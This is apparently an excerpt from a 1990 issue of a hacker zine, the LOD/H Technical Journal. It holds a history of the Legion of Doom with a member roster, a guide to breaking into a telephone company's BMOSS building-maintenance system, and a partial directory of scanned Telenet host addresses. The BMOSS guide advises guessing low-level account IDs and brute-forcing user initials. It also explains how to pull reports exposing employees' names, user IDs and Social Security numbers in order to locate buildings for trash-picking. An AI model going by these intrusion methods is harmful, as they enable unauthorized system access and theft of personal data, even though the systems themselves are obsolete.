forget that they are individuals. These individuals can and do make mistakes
in judgement in some cases. But also, they have been and continue to be
victimized by law enforcement and said others. Over the years I have collected
tens of newspaper and magazine articles about "The LOD", myself, and others
with not a one being perfectly accurate. You have heard it before: don't
believe everything you read. That goes for this article also, although I have
made an honest attempt at ensuring that it is truthful and accurate, as Ripley
said: believe it, or not.

I have been "retired" for quite some time now. My definition of retired is
simply that of keeping my activities to those of a strictly legitimate nature.
It is quite funny yet pitiful to here people say, "once a crook always a
crook" AND BELIEVE IT! That statement is a fallacy. Nearly everyone has done
something wrong when they were young yet many grow up to become the so called
normal, law abiding citizens that society says we should be. At this point in
time and in the foreseeable future, the risks of exploring and learning about
telephone and computer networks in a less than legitimate fashion outweigh the
benefits. I think many of the older hackers have adopted this philosophy out
of necessity. This decision is even easier after reflecting on the events of
which I have seen during the course of my "career". Those events are primarily
those of seeing people's rights being violated by law enforcement. Their
privacy being forsaken by the media. I do not dispute however, that some
hackers have done these same things to other hackers and other people. Neither
side is right or fair so I suppose it is time to exit since it's getting too
hot in the kitchen. I will remain however, in an advisory capacity to the
Technical Journal and group for as long as they continue exist. If you are to
believe the rumors, LOD has been dead many times, again untrue. The main
drawback of becoming a BBS hermit is how the rumors start to accrue as time
progresses. I have been "busted" perhaps a hundred times if you believe every
rumor. The fact is that I have never been visited let alone busted. I have
seen many people get into trouble due to their own carelessness. Those who
have remained unmolested by the authorities are either very careful and
paranoid, or are helping them catch others. I have been extremely careful and
exceedingly paranoid, period.

Now that I have harassed the reader with my comments regarding the whole
hacking/phreaking experience, I present the story. Please note that I realize
many people could care less about all this, and if you are in that category
you can always throw this into the shredder, now. But, there is a sufficient
number of people who actually are curious to get the real story on this stuff
so here it is, presented to correct the many inaccuracies which have surfaced
over the years and also for the sake of posterity.

_____________________________________________________________________________

During the winter break from school in late 1983, I took a trip up to Long
Island, NY to visit Quasi Moto. I had met him in south Florida, and he had
since moved. He decided to put up a BBS, and while visiting him, we worked on
it. For those who do not remember, its name was PLOVERNET. PLOVERNET was
considered a resurrected OSUNY by some since some users migrated to PLOVERNET
after OSUNY went down, at least in part, by an article in Newsweek mentioning
it. A new hacker magazine, 2600, started posting advertisements on various
boards. I had been in contact with Emmanuel Goldstein, the editor of 2600, on
Pirates Cove, another 516 BBS. I gave him the number to PLOVERNET and due to
the large amount of users, (500, of which 70% were relatively active) 2600 had
plenty of response. PLOVERNET went online in January of 1984 and shortly
thereafter it was the busiest BBS around. It was so busy in fact, that a long
distance service called LDX had stopped connecting people who dialed
516-935-2481 which was PLOVERNET's number. Now remember, this is early 1984
here. The practice of blocking calls to a certain number wasn't really done
by common carriers until 1986/87 with the emergence of new security software
and audit trail information. I picked the best phreaks and hackers from
PLOVERNET and invited them onto the newly created LOD BBS. LOD was one of the
first boards which upon connection did nothing until you entered the primary
password, and there was no new user routine as the board was invitation only.
Again, this was back in early 1984. It was a fairly original albeit paranoid
practice at the time, and many boards subsequently adopted the technique as
security became an increasing concern.

Various groups had started forming such as Fargo 4A and Knights of Shadow.
I was admitted into Knights of Shadow in early 84. After suggesting some
promising new phreaks/hacks for membership and being turned down because they
were not well known enough, (ie: they weren't big names even though they knew
more than the guys who supposedly were) I put up the Legion Of Doom! bulletin
board and shortly thereafter started a phreak/hack group of the same name.
This was about May of 84 from what my records show. I had been a member of
KOS and LOD or a brief time and then KOS broke up. Although there were many
users on the LOD bbs, VERY FEW WERE MEMBERS OF THE GROUP! This distinction
seems to have been forgotten by many, since some who were on the BBS have
claimed to have been in the group, which is not true.

The name Legion Of Doom! obviously came from the cartoon series which
pitted them against The Superfriends. I suppose other group names have
come from stranger sources. My handle, Lex Luthor was taken from the
movie Superman I. In the cartoon series, LOD is led by Lex Luthor and
thus, the group name was rather fitting. Being young and naive, I thought
having a handle of someone who claimed to have 'the greatest criminal mind on
Earth' and leading a group of the world's most notorious criminals would be
cool. That was about 7-8 years ago. Now however, I see that there is nothing
cool or attractive about being a criminal (believe it, or not).

The original group consisted of phreaks who I had thought were very good
but were not considered 'famous' like those in KOS. Those original members
later became some of the best known phreak personalities and contributed
substantially to the knowledge of new and old phreaks alike. A list of members
from the very beginning to the present follows. Through my records and from
the best of my recollection I have approximated dates of entrance and exit and
other information. Also, I believe I have a complete list however, there
could be a mistake or two. Very few if any, handles from the past have been
duplicated by 'impostors' whether knowingly or unknowingly.

I look at this article as a historical document seeing how no other group
has survived as long as LOD has. LOD originally consisted mainly of phreaks,
but had split into two separate entities. LOD for telecommunications
hobbyists, and LOH for hacking and security enthusiasts.

Handle Entered Exit Location Reason for leaving
-----------------------------------------------------------------------------
Lex Luthor early 84 CURRENT Here/There ---CURRENT MEMBER---
Karl Marx early 84 late 85 Colorado Went underground/quit.
Mark Tabas early 84 late 85 Colorado Many reasons.
Agrajag The Prolonged early 84 late 85 California Loss of interest.
King Blotto early 84 late 85 Ohio No time/college.
Blue Archer early 84 Fall 87 Texas College.
The Dragyn early 84 late 86 Minnesota No time/lost interest.

Unknown Soldier mid 84 early 85 Florida Busted- Toll fraud.
Sharp Razor late 84 early 86 New Jersey Busted- Abusing CIS.
Doctor Who late 84 early 86 Mass. Misc. Trouble
Lord Havok late 84 CURRENT Here/There ---CURRENT MEMBER---
Sir Francis Drake late 84 early 86 California ???
Paul Muad'dib late 84 early 86 New York Went underground/quit.
Phucked Agent 04 late 84 late 87 California No time. School.
X-man late 84 mid 85 New York Busted- Blue boxing.
Randy Smith late 84 mid 85 Texas ???

Steve Dahl early 85 early 86 Illinois Busted-Carding.
The Warlock early 85 early 86 Florida Lost interest.
Terminal Man early 85 late 85 Mass. Kicked out-malicious hacking

Silver Spy late 86 Fall 87 Mass. College.
The Videosmith early 86 Fall 87 Penn. Lost interest.
Kerrang Khan early 86 Fall 87 U.K. ???
The Marauder early 86 mid 88 Conn. Lost interest.
Gary Seven early 86 mid 88 Florida Lost interest.
Bill From RNOC early 87 late 87 New York Misc. Trouble.

Carrier Culprit mid 87 mid 88 Penn. Lost interest.
Master of Impact mid 87 mid 88 California School.
The Leftist mid 87 Sum 89 Georgia Misc. Trouble.
Phantom Phreaker mid 87 Fall 89 Here/There Lost interest.
Doom Prophet mid 87 Fall 89 Here/There Lost interest.

Thomas Covenant early 88 early 89 New York Misc. Trouble.
The Mentor mid 88 Sum 89 Here/There Lost interest.
The Urvile mid 88 Sum 89 Georgia Misc. Trouble.
Phase Jitter mid 88 CURRENT Here/There ---CURRENT MEMBER---
Prime Suspect mid 88 CURRENT Here/There ---CURRENT MEMBER---
The Prophet late 88 Sum 89 Georgia Misc. Trouble.
Skinny Puppy late 88 CURRENT Here/There ---CURRENT MEMBER----
Professor Falken late 89 CURRENT Here/There ---CURRENT MEMBER---

Directory key:
"Lost Interest": simply means they lost interest in phreaking/hacking in
general, not lost interest in LOD/H.
"???": reason for leaving is unknown.
Misc. Trouble: Exactly that. Too much to go into here.
Of all 38 members, only one was forcefully ejected. It was found out that
Terminal Man destroyed data that was not related to covering his tracks. This
has always been unacceptable to us, regardless of what the media and law
enforcement tries to get you to think.
Remember, people's entrance/exit times have been estimated.

[ End of Article ]
The LOD/H Technical Journal, Issue #4: File 07 of 10

The Trasher's Handbook to B.M.O.S.S.
by
Spherical Aberration

INTRODUCTION:

Those who have actually trashed at Bell Co. before know that finding an
installation can be a pain. Most Telco buildings these days are un-marked,
plain, and generally overlooked by the average person. The buildings
were specifically made so that they WOULD be overlooked, concealing
itself and its contents. Knowing where all Bell Co. installations are
would be nice, and through the help of BMOSS we can find out where they
ALL are.

NOTE: It is possible to get locations from your city hall, just take a
look at what property Bell Co. owns and locate it. However, there are few
catches to this method. First, most cities charge you to find out who
owns what property and there might be a waiting period of a few days.
Second, not all Bell Co. property is owned by Bell Co. There are
instances of Bell Co. renting a piece of property from a company and
using the existing building, possibly with the leasing companies logo
still on it.

BMOSS stands for Building Maintenance Operations Service System.
BMOSS provides computer support for daily building maintenance tasks.
A comprehensive database helps users keep track of repair activities.
Telco field mechanics logon everyday to do assorted field mechanic
stuff. From BMOSS they can check on tasks needed to be done, send
messages to users, charge various Telco installations for work, log time
sheets, generate purchase orders, see where his buddies are eating lunch etc.

BMOSSes are usually located in a BOCC (Building Operations Control
Center) or in a REOC (Real Estate Operations Center). BMOSS is run
under AT&T Unix System V and at some points is quite Unix-like. At each
center is one PDP-11/44 or a PDP-11/84 mainframe that is the base of
operations for that center and other installations supported by that
BOCC/REOC.

LOGGING ONTO BMOSS:

Before logging on to BMOSS you must select the proper type of
terminal emulation. BMOSS has 4 types of emulations available for all
users. Users within the BOCC/REOC use either VT100 or VT220 compatible
terminals, while other internal stations will use an LA120 printer
terminal. Field Mechanics at a remote location use their typewriter
like LA12 printer terminals.

Identifying a BMOSS dialup is not that hard at all. After hitting a
three [CR]'s the system will respond with something like this:

(BEEP!)

Good Morning (Depending on what time of day it is)

BASE/OE - Fri 04/23/90 09:43:22 - Online 9

User ID?
Password?

Typically user IDs are the three initials of the field mechanics name.
After inputting your ID you will be prompted with a Password? request.
Passwords can be from 6 to 8 characters in length, including punctuation
marks, the first letter must begin with an alphabet-letter or a number.
They cannot contain spaces or the users first/middle/last name.
Periodically the system will prompt the user for a new password. This
period of time is usually set by the system administrator.

I have found that the "WRK:A10" user ID or a variation of WRK:xxx
where xxx is a alpha-numerical combination has worked excellent for me.
I believe the WRK:xxx is some type of low-level account when field
mechanics lose their current ID/PW combination. Initials also have been
found on most of the systems, so a WRK:xxx and Initials brute-force attempt
just may give you a working ID.

IN BMOSS:

Once penetrating initial security you are then prompted with BMOSS's
FLD> main level identifier. This FLD> changes as you move from BMOSS's
root to the various main BMOSS branches.

Sometimes when you logon to BMOSS you will receive a memo saying,
"NOTE - Check your office" at this time go to the Office and read the memos
sent to you. Read THE OFFICE later in this article to learn how.

BMOSS was designed with the average Joe in mind and is very logically
laid out. BMOSS was modeled after UNIX's Tree-oriented structure.
Here is a Tree of BMOSS's structure:

BMOSS
_____________|_____________
| | | | | |
CON DAT ACT FOR BIL OFF

Main Branches:
CON- Control Functions (Sys Admin payroll/timesheet functions)
DAT- Database Maintenance (What we are mainly concerned with)
ACT- Field Activity (Handles field activities)
FOR- Force Administration (Recording labor hrs for time sheets etc.)
BIL- Bill Paying (Processing purchase orders, producing expense accts.)
OFF- Electronic Office (Receive/Send Messages or Page users)

Each main branch then branches off into its own specific
commands. I will concentrate on the Database Maintenance functions since
the other functions have little or no use to us.

DATABASE MAINTENANCE:

To haul in the mother lode you go into the Database Maintenance area
from the root. This is accomplished by typing DAT in at the FLD>
prompt. Now you should get a DAT> prompt meaning you are now in the
Database Maintenance section. To get a listing of the available DAT
commands type in 'SHO' which is short for SHOW. We are mainly concerned
with the BLD (Building Master) function. Once the BLD function is
selected you will be prompted for a sub-form. There are 7 sub-forms for
the BLD function.

BLD Sub-Forms:
1. GEN- General Background
2. OWN- Building Ownership (used for adding a new building to database)
3. LES- Lease Terms (used for adding a new building to database)
4. EMG- Emergency Data (contains Police and Fire Dept. that serve this
location and their respective telephone numbers, and whether the
location has backup power and fire-sprinklers etc.)
5. RES- Maintenance Responsibility (Maintenance entries for building)
6. WRD- Building Warden (Building Wardens number etc.)
7. NOT- General Notes (Notes about the particular building)
8. ACC- Accounting Distribution (Account for particular building)

Accessing the above information is as easy as selection of the three
letter identifier at the Sub-Form prompt. We are particularly concerned
with the GEN (General Background) information. This function gives us the
following data:

1. Building's Number
2. Building's Complete Address
3. Building's Name
4. Building's Sector (Bell informational purposes only)
5. Building's Zone (Bell informational purposes only)
6. Whether or not Bell owns the building. (A Y/N combination is usually
shown here. Y meaning its is owned by Bellco, N meaning its not
owned by Bellco.)
7. The building's group (One letter identifier)
8. The building's use. (Garage/Warehouse/Office etc.)
9. The kind of telephone equipment used in the building. (ESS1A etc.)
10. Whether or not Bell is Sub-leasing parts of the building. (Y/N identifier)
11. The number of floors in the building
12. The number of basements in the building (A number of 3 here would
mean the building has 3 below ground level floors.
13. Whether or not the building has a cable vault. (Y/N identifier)
14. Gross Square footage of the building
15. The number of reserved parking spaces for the building.

Once entering the DAT section and entering GEN as your sub-form
selection you will be prompted for a building number. Random selection
of building numbers is necessary because they vary from area to area.
Once a legitimate building number is accessed the above information will
be displayed.

Ok, you now have the information you need, how do you get back to a
previous directory or even log off ? That's quite easy. Typing in EXI
(short for EXIT) will bring you back up to the root FLD> one directory at
a time. For logging off the system you should hit EXI until you reach the
FLD> root then BYE and you will get:

BASE/OE - Fri 4/23/90 10:22:13 - Offline 9

Have a Good Morning

OTHER FUNCTIONS:

I have found the REPORTS function most helpful in finding other
user IDs. To get a listing of the 20+ different types reports type
'HELP REPORT' at the FLD> prompt. We are particularly concerned with
REPORT 41, the Estimated vs. Actual Hours Log. We bring this up by
typing from the FLD:

FLD> REPORT 41 04/02/90-04/06/90 <cr>

You are inquiring for the estimated vs. actual hours time on a series
of jobs from April 4th 1990 through April 6th 1990. The output then
kicks out the hours and such. Every field mechanic that worked throughout
those days will be displayed in- First name, Middle Initial, and Last Name
totally spelled out for you.

Another useful report is REPORT 90- Data Access Log. It is called up
by typing:

FLD> REPORT 90 <cr>
Date Range? 04/06/90-04/08/90

The system then kicks out all users that used the SCOPE command on
other users. The system prints out the users full name and actual USER ID
and who the user scoped including the scoped-user's Social Security number.

THE OFFICE:

When you are prompted that you should check your messages you should
do so immediately before any work is done in BMOSS. First you must go to
your office which is done by selecting OFF from the FLD> identifier.
Once this is done your FLD> prompt will change to a OFF> prompt. Typing
HELP will give you the available HELP commands for the office.

To check the messages type in:

OFF> STATUS <cr>

BMOSS will reply with the following: (example)

Memo From User Subject Status
-------------- ------------------ ---------------------- ---
IPAAA 04/01/90 Wile E Coyote Current Task Info OUT
BNAAA 04/02/90 Susie B Hott Last Saturday Night IN

The user then sees he has a memo from his boss about his current
tasks and a memo from his co-worker/seductress Susie B. Hott. Fuck his
boss, he wants to read what Susie has to say. So you type in:

OFF> PRINT BNAAA <cr>

--- MEMO ---
Date: 04/02/90
Time: 08:11

From: Susie B Hott
To: Legion Of Doom

Subject: Last Saturday Night

LOD, I really enjoyed last saturday night. We must do it again.
Give me a call soon, 555-WETT.
** Susie

A useful command is a list of OFFICE users. This gives you another
listing of user's Full-Name/ID combinations. Get this by typing:

OFF> USERS <cr>

It will then print out the users who are in the Electronic Office
database.

CONCLUSION:

You can get HELP from anywhere just by typing HELP from the prompt.
Or if you need specific information about a function type in HELP then
the function name. Such as:

FLD> HELP REPORT (This gives you options/help on the REPORT command)

BMOSS can be used for a large amount of purposes for the
hacker/trasher. Even though it doesn't have any really powerful
commands to self-destruct the telephone company it can be used to access
other building's trash, and other things that may interest you.

______________________
( Spherical Aberration )
The LOD/H Technical Journal, Issue #4: File #08 of 10

The Legion Of Hackers Present:
Updated: Telenet Directory
Part A: Addresses 201XXX to 424XXX
Revision #5 Last Updated: 2/10/90
(Includes Mnemonic Host Names)

Scanned and Written by:
Erik Bloodaxe

INTRODUCTION:
-------------

It has been some time since our last update. Our old list (Revision #4) has
been distributed to those in the United States and internationally thanks to
the widespread use of the PSS network. For this reason we are including the
format for converting this 'local' address list into accessible hosts using
the standard scheme for telenet when accessed from 'foreign' networks.

For example, the local address: 20114 is 031102010001400 using the standard
format. 3110 is the DNIC (Data Network Identifier Code) for USS Telenet
and the zero preceding it is needed to make it clear to the foreign
network that the NUA (Network User Address) is a non-local address. Another
example, the local address is 203155 would be: 031102030015500 thus: 0DNIC NPA
00 XXX YY NPA is the area-code prefix (this is not necessarily an area code),
XXX is the sub-address and YY is the port which is usually 00.
For those unfamiliar with Telenet addressing, it generally follows the format
of grouping hosts into area codes. Thus, our directory is grouped accordingly.
There are 'non-standard' address prefixes which are rather obscure. These
commonly are owned by the same company or organization, whereas the area code
format contains hosts from many companies or organizations. The state an area
code resides is also listed to give you an idea of its location.
I have also included Telenet commands, mnemonic addresses, a somewhat current
list of pc-pursuit dialers, and a few things to consider for the would-be
Telenet scanner.

NOTES:

When accessing telenet from abroad, ignore the '$' after the address. This
denotes to users of the USA that an NUI (Network User ID) is required due to
the host not accepting collect charges for the connection.

Addresses preceded by a * refuse collect connections, but I was
unable to connect with them to determine what they were.

Addresses that have no comments next to them either hang up upon connection,
or I was unable to evoke any response from them.

Due to its immense size, this directory has been presented in a 'rougher' form
than our previous ones. The time to make it look 'pretty' was determined to
not be worth the effort.

TELENET COMMANDS
----------------

Most commands are listed in their four character form, however,
some may be abbreviated to merely one character (ie. C & D).

CONN Allows user to connect to a specified host
DISA ECHO
DISA FLOW
DISA TFLO
DISC Disconnect from current host
DTAPE ?
ENAB ECHO
ENAB FLOW
ENAB TFLO
FULL Full duplex
HANG Hang up port
HALF Half duplex
MAIL Telemail service
PAR Set parameters as specified
PAR? Shows current parameter settings
RESE Resets the node to inactive
RST Sets parameters of remote host as specified
RST? Shows current parameters of remote host
SET Same as PAR
SET? Same as PAR?
STAT Shows current port
TAPE ?
TELE Telemail service
TEST CHAR Test of all ascii characters
TEST ECHO Test which echos all characters typed
TEST TRIA Test which makes repeating triangle
TEST VERS Shows current pad software version

The default command is CONN, so if an address is entered at the
'@' prompt, an attempt will be made to connect to that address.

A connection attempt may be aborted by sending a break signal.
This will put you back to the '@' prompt.

To return to the '@' prompt from an established connection the
user must type '@' followed by carriage return.

Normal 300/1200 users awaken the pad with two carriage returns.
2400 baud users must type '@' then carriage return.

To awaken the pad in the Uninet format, type: carriage return,
period, then carriage return (upon initial connection).

To find the telenet dialup nearest your location, call 800-424-
9494 at 300/1200 baud. At the '@' prompt, type 'MAIL'. Enter
user name 'PHONES' with password 'PHONES'.

TELENET DIRECTORY
-----------------

201--NEW JERSEY--ADDRESSES SCANNED: 0-2000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 1 PC Pursuit Dialer (1200)
14 WELCOME, NAME OR #?
15 " "
$ 20 VM/370
$ 22 PC Pursuit Dialer (2400)
* 23
25 WELCOME, NAME OR #?
32 D&B
$ 34 PRIME MWH
$ 35 PRIME
45 NEWSNET
$ 49 VAX
50 UNIX Interet
$ 51 PRIME USCGB
53 Colgates IICS
$ 55 PRIME USCGB
$ 66 PRIME SYS001
67 Warner Computer Systems
68 " "
69 " "
74 enter class
83 ENTER ID:
84 D&B
86 D&B
88 D&B
89 VM/370
$ 129a
138 HP-3000
* 140
146 HP-3000
149 VAX
* 150
156 UNIX Securities Data Company
159a
163 VU/TEXT
164 VU/TEXT
166 VM/370 New Jersey Educational Net
171 >>
172 >>
173
200 D&B
201 D&B
220 VAX Investment Technologies
225 VAX " "
$ 241
242 D&B
243 D&B
244 D&B
246 D&B
249 password required
* 251
252 PRIME
259 VAX CCMI/McGraw Hill
* 260
$ 301 PC Pursuit Dialer (1200)
334 TINTON1
* 336
$ 350 Concurrent Computer Corp
353 enter switch characters
$ 355 Concurrent Computer Corp
359 Telenet Async to 3270
367
* 371
* 379
453 Telenet Async to 3270
454a Telenet Async to 3270
$ 458 ENTER REQUEST
$ 459 "
461 VAX
463a Telenet Async to 3270
470 Decserver
$ 472 MHP201A
476 X.29 Password:
477 Please enter logon cmd
$ 478 MHP205A
479 Please enter logon cmd
520 Enter Access ID:
521 Bankers Trust Online
522 VAX NYBTRP
* 548
586 Dow Jones News Retrieval
587 " "
589 " "
604 Lipton Network
700 HP-3000
702 TOPS-20 CEI
722 INSCI/90
730 "
751 "
752 "
770 "
792 "
799
830 INSCI/90
841 "
850
870 INSCI/90
890 "
895 "
899
910 INSCI/90
912 "
914 "
916
918 INSCI/90
940 "
950 Bankers Trust Online
951 " "
952 " "
953 " "
954 " "
955 " "
956 " "
957 " "
958 " "
959 " "
999
1025
1051 VU/TEXT
1052 "
1053 "
1054 "
1055 "
1056 "
1057 "
1058 "
1059 "
1060 "
1061 "
1062 "
1063 "
1064 "
1065 "
1066 "
1067 "
1068 "
1069 "
1075 "
1076 "
1077 "
1078 "
1079 "

202--WASHINGTON D.C.--ADRESSES SCANNED: 0-800

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
10 PRIME
31 VAX News Machine
$ 36 Network Sign-on Failed
$ 38 "
$ 47 VAX
* 48
49 ENTER SYSTEM ID--
$ 115 PC Pursuit Dialer (300)
$ 116 PC Pursuit Dialer (1200)
$ 117 PC Pursuit Dialer (2400)
* 123
132 VAX
133 BA
134 BA
$ 138 VAX Gallaudet University
$ 139 DEC-10
141 PRIME Telemail
142 PRIME Telemail
$ 149
150 VAX IDR
* 151
$ 154 Telenet Async to 3270
$ 155a Telenet Async to 3270
$ 156 VAX American Psychiatric Assn
* 157
161 UNIX pac
162 enter user id-
$ 165 HP-3000
$ 166 VAX
201 Host Name:
202
203 USER ID:
214 PRIME SPA
217
* 224
* 230
232a
$ 235 PRIME AMSC
$ 239 PRIME AMSA
* 241
* 242
* 243
245 AOS
* 253
* 254
255 Morgan Stanley Network
* 258
* 260
* 265
* 266
* 275
* 276
* 277
$ 278 USER ID
308 PRIME
309 PRIME
312 PRIME
* 330
* 331
* 332
* 333
* 334
* 335
336 VAX Congressional Quarterly
337 VAX "
$ 343 PRIME OT
360 HP-3000
361
362
* 364
365 LEXIS/NEXIS
366 "
367 "
* 371
* 372
* 373
* 377
$ 390 #Connect Requested
$ 391 "
* 403
430 >
* 433
* 434
439 Institute of Nuclear Power
440 "
441 "
442 you are now connected
444 Institute of Nuclear Power
$ 455
456
457
458
$ 462
$ 463
465
466
467
469
470
472
$ 473
$ 474
$ 475
$ 532 VAX
$ 535 AOS
* 536
* 652
* 653
* 654
693 HP-3000 MPE XL
709
710
711
712
810 Telenet Async to 3270
811a Telenet Async to 3270
1180 INVALID-SW-CHARACTERS
1181
1182 NCR Comten

203--CONNECTICUT--ADDRESSES SCANNED: 0-600

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
22 VM/370
* 57
$ 60 HP-3000
66 Login Please:
72 HP-3000
73a Password:
75 VAX
$ 105 PC Pursuit Dialer (2400)
$ 120 PC Pursuit Dialer (300)
$ 121 PC Pursuit Dialer (1200)
$ 132 VAX
* 135
136 PRIME SYSA
$ 140 ID
165 Telekurs USA
* 230
* 231
304 HP-3000
$ 305 Name?
307 HP-3000
310
* 311
* 331
* 332
* 501
602 DESTINATION?

205--ALABAMA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 30
$ 33 ID
* 34
* 36
$ 73 PRIME ALABMA
* 137
$ 145 HP-3000

206--WASHINGTON--ADDRESSES SCANNED: 0-1000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 HP-3000
$ 30 HP-3000
32 VAX
$ 35 DMOLNCT
$ 38 AOS
$ 40 PRIME P6350
$ 42 AOS
$ 44 AOS
$ 50 AOS
53
$ 57 AOS
65 PRIME OAD
$ 131 AOS
$ 132 VAX ETA-RX
$ 135 AOS
137a Boeing msg switch
$ 138 USSMSG2
$ 139 WANG VS SECURITIES (FRS)
$ 141 AOS
$ 145 AOS
$ 146 PRIME SEATLE
$ 147 AOS
* 150
$ 160 AOS
$ 161 AOS
175a Boeing test
$ 205 PC Pursuit Dialer (300)
$ 206 PC Pursuit Dialer (1200)
207a
$ 208 PC Pursuit Dialer (2400)
$ 250 WANG VS SYSTEM ONE (FRC)
$ 251 WANG VS SYSTEM TWO (TACOMA)
$ 338
$ 357 HP-3000
$ 430 Environmental Ctrl Monitor
439 bcs network
440 NOS Boeing
447 NOS Boeing
448 bcs network
449 VM/370

207--MAINE--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 51

208--IDAHO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 42 AOS
$ 43 AOS
$ 56 AOS
$ 131 AOS
$ 134 AOS
$ 135 AOS
$ 136 AOS
$ 137 AOS
$ 140 AOS
$ 141 AOS
* 150
$ 152 AOS

209--CALIFORNIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 AOS
* 33
* 34

211--DUN & BRADSTREET--ADDRESSES SCANNED: 0-100/1000-2000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
1140
1142
1145 Dun & Bradstreet Terminal
1190 " "
1195 " "
1240 " "
1244 " "
1290 " "
1291 " "
1295 " "
1390 " "
1391 " "
1392 PRIME
1396 Dun & Bradstreet Terminal
1490 PRIME
1491 Dun & Bradstreet Terminal
1492 " "
1493 " "
1494 " "
1540 " "
1591 " "
1594 " "
1594 " "
1640 " "
1690 " "
1693 " "
2140 CCS Online
2141 CCS Online
2142 VM/370
2143 sls1
2145 VM/370
2150 PRIME
2151 fsd2
2152 socy
2153 css3
2154 CCS Online
2155 CCS Online
2156 ecl1
2157 tbs1
2158 dbc1
2159 exx2
2160 nyt2
2162 css1
2163 css2
2164 bofa
2165 soc1
2166 soc2
2167 socx
2168 soc3
2169 soca
2170 socb
2171 socc
2172 dnb1
2173 mdy2
2174 koln
2175 fsd1
2176 ptts
2177 has1
2178 has3
2179 levi
2180 nyt1
2181 pers
2182 risk
2183 usc1
2184 cids
2185 zyt1
2186 inel
2187 fop1
2188 kbm1
2189 kbm2
2190 kbm3
2191 kbm4
2192 sls1
2193 mdy1
2194 ira1
2195 ira2
2196 why1
2197 ndg1
2198 lit1
2450 PRIME
3141 IDC/370
6140 OAG

212--NYC-BRONX & MANHATTAN--ADDRESSES SCANNED: 0-1200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 11 PLEASE BEGIN
$ 28 PC Pursuit Dialer (2400)
31 VM/370
* 34
39 PRIME IDDD
40 PLEASE ENTER /LOGIN
* 48
$ 52 PRIME SYSA
$ 73 USS00
74 VM/370
79 ENTER ID:
* 85
* 86
$ 99 HP-3000
105 ****INVALID SIGNON
106 "
108 "
109 "
110 "
112 VM/370
$ 124 VAX
131 VM/370
* 132
* 135
137 PRIME NY60
141 PRIME Telemail
142 PRIME "
145 ENTER ACCESS ID:
146 "
* 149
152 VAX
$ 154 PRIME NYORK
* 157
* 158
* 160
$ 167 PRIME MPISBS
170 Information Services Net
172 "
$ 173 Brown Brothers
174 Information Services Net
* 197
200 ENTER IDENTIFICATION:
216 Bank of New York
226 USER ID
231 VM/370
$ 235 PRIME JAMACA
237 TIMEINC NYK
238
246 VAX UniTraC
248 PRIME RYE
* 249
* 255
* 256
$ 257 BANAMEX Data Network
258 ENTER ACCESS ID:
$ 259 VAX BTNET
260 Bankers Trust Online
263 VAX
266 UNIX
267 UNIX
$ 271 :
* 273
$ 274 INVALID INPUT
275 Bankers Trust Online
* 278
* 279
* 306
$ 315 PC Pursuit Dialer (1200)
320 ENTER IDENTIFICATION
321 "
$ 322 COMMAND UNRECOGNIZED
* 326
328 ENTER IDENTIFICATION
* 336
345 PRIME NMSG
$ 350 VTAM002
$ 351 "
* 352
* 354
359
376 Bankers Trust Online
377 "
378 "
379 "
* 432
433 VAX
443 VAX
444 PRIME EMCO
$ 446 VAX
449 VM/370
446
468
479 Invalid Login Attempt
* 496
* 497
500 enter a for astra
501 "
502 "
503 "
504 "
505 "
506 "
507 "
535 TIMEINC NYK
536 "
537 "
539 VOS
$ 540 VAX Client Videotext Server
$ 541 VAX "
544 TIMEINC NYK
545 "
$ 546 APLICACO:
$ 548 PRIME TREPP1
552 TIMEINC NYK
553 "
554 "
566 "
567 "
* 576
577 Telenet Async to 3270
579a Telenet Async to 3270
580
615 Shearson Lehman Hutton
631
649 WANG VS
693
702
713 PRIME NY60
$ 726 VAX
$ 737 FINLAY FINE JEWELRY
$ 752 "
$ 753 "
755 VM/370
* 768
935
* 970
* 971
* 972
* 973
* 974
* 975
* 976
* 977
* 978
* 979
981 UNIX
* 1009
* 1031
1034
1036
1039
* 1040
$ 1045 HP-3000
1049 MHP201A
1052 PRIME FTC0
1069 VAX
$ 1071 GS/1
$ 1072 GS/1
* 1074
* 1075

213--CALIFORNIA--ADDRESSES SCANNED: 0-1200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
21 PRIME C6
22 PRIME D6
* 23
24 Marketron Research
25
33
35 Marketron Research
40 PRIME A6
* 41
44
* 45
51
$ 52 PRIME AIS8
* 54
* 57
58 PRIME ACSI
79 UNIX Interactive Systems
88 PRIME MSCOST
$ 92a
102 PRIME TRWE.A
$ 103 PC Pursuit Dialer (1200)
105 PRIME SWOP
$ 113
118 VAX
121 PRIME SWWE1
122 PRIME TRNGW2
123 PRIME SWWA1
124 PRIME CS.CAR
125 PRIME SWLAR
126 HP-3000
128 PRIME CS.SD
$ 143 HP-3000 ANA Trading Corporation
* 144
151 PRIME CSSWR1
153 PRIME SWLA1
154 PRIME SWWCR
155 PRIME CS.LA
$ 166 BW/IP International Inc.
* 169
172a
$ 176 AOS
* 178
199 PRIME C6
219
220 Telenet Async to 3270
221a Telenet Async to 3270
227a
* 249
* 250
* 252
* 255
* 256
* 257
260 Telenet Async to 3270
261a Telenet Async to 3270
* 336
$ 338 HP-3000
340 PRIME TRNGW
342 PRIME SWLB1
347
* 361
$ 369 PRIME LA
* 371
374 Telenet Async to 3270
375a Telenet Async to 3270
$ 412 PC Pursuit Dialer (1200)
$ 413 PC Pursuit Dialer (2400)
* 464
485a
488a
* 1041
* 1043
1403 COMPUTAX
1404 COMPUTAX

214--TEXAS--ADDRESSES SCANNED: 0-1200

